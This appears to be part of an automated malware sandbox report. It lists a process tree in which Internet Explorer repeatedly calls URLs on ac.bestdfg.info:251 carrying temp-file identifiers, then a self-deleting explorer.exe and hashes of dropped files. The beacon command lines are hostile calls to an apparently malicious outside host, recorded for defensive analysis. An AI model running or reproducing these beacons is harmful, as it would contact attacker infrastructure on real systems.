C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a5&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e8182⤵PID:2088
-
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a5&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e8183⤵PID:2096
-
-
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a6&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e8182⤵PID:2220
-
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a6&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e8183⤵PID:2228
-
-
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a7&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e8182⤵PID:2360
-
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a7&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e8183⤵PID:2368
-
-
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a8&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e8182⤵PID:2428
-
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a8&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e8183⤵PID:2436
-
-
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a9&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e8182⤵PID:2548
-
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a9&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e8183⤵PID:2556
-
-
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a10&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e8182⤵PID:2632
-
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a10&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e8183⤵PID:2640
-
-
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a11&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e8182⤵PID:2700
-
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a11&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e8183⤵PID:2708
-
-
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe2⤵
- Deletes itself
PID:2800
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{94D78151-385E-11ED-AA2C-DE5CC620A9B4}.dat
Filesize5KB
MD5db91fc6356999867cdc3413f76b8f682
SHA13bc9e0d62c0edc352ae747a346ce69d4c5358eb5
SHA256938c5ef994c01185ccc1d710c9ffcfb35d17826e5f6ea349f68104449c09e4e1
SHA512737142551da58e8aa900e2ec22ac70dd2cc3f9689c92b0052c0871d9c063eb1407ec631938653d9bc7229b9dfc04212a85d304597543b43731445ec60db434b7
-
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{94D7A861-385E-11ED-AA2C-DE5CC620A9B4}.dat
Filesize4KB
MD549c8aa8a95bfff855dd6078dc61f8f03
SHA1dfec7b1153ff7718d89d0cf841cb6df6f67e2fa6
SHA2561c661cfb7ceac21d818c61924ea682ec29d61773d48bbbe1a73aacf70be9fa99
SHA51282641f44138288e9a99df77f8386b9d2fe11b63d33178d0d6b4364d55d410a4b5c6d41f7afe8a50c959b80ce87b9055973dd629d18291a9d13976ba9a354c690
-
Filesize
606B
MD55c9385e14bfc24d22329c39d32d71709
SHA17b1cd48f44fe462eae697ed05b26f1b5f535eee6
SHA256264c3a191f86843ba0653ff5c8d426406f9700629e39e365021e7b9f90e20932
SHA5120e0d5e4899dd8d1897c0d9ad41f34b81010be9d9d1765694bb078c92dfa409247ae81c5821a034e70caf6c1a4a0b9b580a07f4a198e2fde2dc7197b10c43dda5
-
Filesize
18KB
MD5994669c5737b25c26642c94180e92fa2
SHA1d8a1836914a446b0e06881ce1be8631554adafde
SHA256bf01a1f272e0daf82df3407690b646e0ff6b2c562e36e47cf177eda71ccb6f6c
SHA512d0ab7ca7f890ef9e59015c33e6b400a0a4d1ce0d24599537e09e845f4b953e3ecd44bf3e3cbe584f57c2948743e689ed67d2d40e6caf923bd630886e89c38563
-
Filesize
66KB
MD59eb6cecdd0df9fe32027fcdb51c625af
SHA152b5b054ff6e7325c3087822901ea2f2c4f9572a
SHA25654cf1572ed47f614b0ffb886c99fc5725f454ef7ff919fbb2fd13d1cbe270560
SHA512864742ec6f74f94057b54cd9b09707c0125ac8db4844fa80af201e8b72a811bb68276c993e75bce67e5ece4f83644572edbdee5e963634c5a37839615faea97a
-
Filesize
4KB
MD55e14f6774c43bdff6ffe0afb0d51c47f
SHA1fb1e7b6e63afa6db6aa2033b5e7e90f1f4ba5e27
SHA2567cb51ccf21655e9590a6c3232920b16a3dfef15ffe9df7b8e71f487ca8c24da9
SHA5126ac533c0485156a68bd1460d8219acf7539b766590910cd646f4d7d4572c072f45369712d88d4e698f4e94aead8082abcbfacc3d6fe890046898f6c6d85274e3
-
Filesize
11KB
MD500a0194c20ee912257df53bfe258ee4a
SHA1d7b4e319bc5119024690dc8230b9cc919b1b86b2
SHA256dc4da2ccadb11099076926b02764b2b44ad8f97cd32337421a4cc21a3f5448f3
SHA5123b38a2c17996c3b77ebf7b858a6c37415615e756792132878d8eddbd13cb06710b7da0e8b58104768f8e475fc93e8b44b3b1ab6f70ddf52edee111aaf5ef5667
-
Filesize
20KB
MD550fdadda3e993688401f6f1108fabdb4
SHA104a9ae55d0fb726be49809582cea41d75bf22a9a
SHA2566d6ddc0d2b7d59eb91be44939457858ced5eb23cf4aa93ef33bb600eb28de6f6
SHA512e9628870feea8c3aaefe22a2af41cf34b1c1778c4a0e81d069f50553ce1a23f68a0ba74b296420b2be92425d4995a43e51c018c2e8197ec2ec39305e87c56be8
-
Filesize
20KB
MD550fdadda3e993688401f6f1108fabdb4
SHA104a9ae55d0fb726be49809582cea41d75bf22a9a
SHA2566d6ddc0d2b7d59eb91be44939457858ced5eb23cf4aa93ef33bb600eb28de6f6
SHA512e9628870feea8c3aaefe22a2af41cf34b1c1778c4a0e81d069f50553ce1a23f68a0ba74b296420b2be92425d4995a43e51c018c2e8197ec2ec39305e87c56be8
-
Filesize
10KB
MD538977533750fe69979b2c2ac801f96e6
SHA174643c30cda909e649722ed0c7f267903558e92a
SHA256b4a95a455e53372c59f91bc1b5fb9e5c8e4a10a506fa04aaf7be27048b30ae35
SHA512e17069395ad4a17e24f7cd3c532670d40244bd5ae3887c82e3b2e4a68c250cd55e2d8b329d6ff0e2d758955ab7470534e6307779e49fe331c1fd2242ea73fd53